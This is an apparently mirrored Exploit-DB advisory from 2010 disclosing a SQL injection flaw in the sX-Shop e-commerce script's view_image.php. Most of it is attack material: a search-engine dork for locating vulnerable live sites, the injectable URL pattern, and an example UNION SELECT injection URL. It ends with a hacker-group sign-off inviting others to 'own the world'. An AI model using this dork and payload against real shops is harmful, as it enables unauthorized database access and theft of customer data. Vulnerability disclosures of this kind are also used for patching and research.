sX-Shop – ‘view_image.php’ SQL Injection - 体验盒子

作者： secret

日期： 2010-08-05

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14557/

#############################################################################################################
## sX-Shop/ view_image.php SQL Injection##
## Author : secret - mohammed.atta@hotmail.com ##
## Homepage : http://swissfaking.net/ ##
## Date : 05 August, 2010##
#############################################################################################################
____ ____ _____ ___ ____ ______ ____ ___ ______
/ __// __// ___// _ \ / __//___//_// _ \ / _ |/ |/ /
 _\ \ / _/ / /__ / , _// _/ / /_/ / / , _// __ | //
/___//___/ \___//_/|_|/___//_/____/___//_/|_|/_/ |_|/_/|_/ 
 /___/

####################################################
# sX-Shop / view_image.php SQL Injection
####################################################
# Discovered by : secret
# Site: http://swissfaking.net/
# Dork: powered by sX-Shop ; inurl:"view_image.php" intext:sX-Shop
# Vendor: http://www.source-worx.de/
# Version : *newest version*
# Exploit : [site]/shop/view_image.php?id=[SQL Injection]
# Tested on : XP - Linux

e.g. http://www.site.com/shop/view_image.php?id=416+and+1=0+Union+Select(UNEXVISIBLECOLUMN)+2+3
 
########################################################################################

#note : IRAN owns ;-) - to all iranian Hackers in the world, add me and let's own the world ;)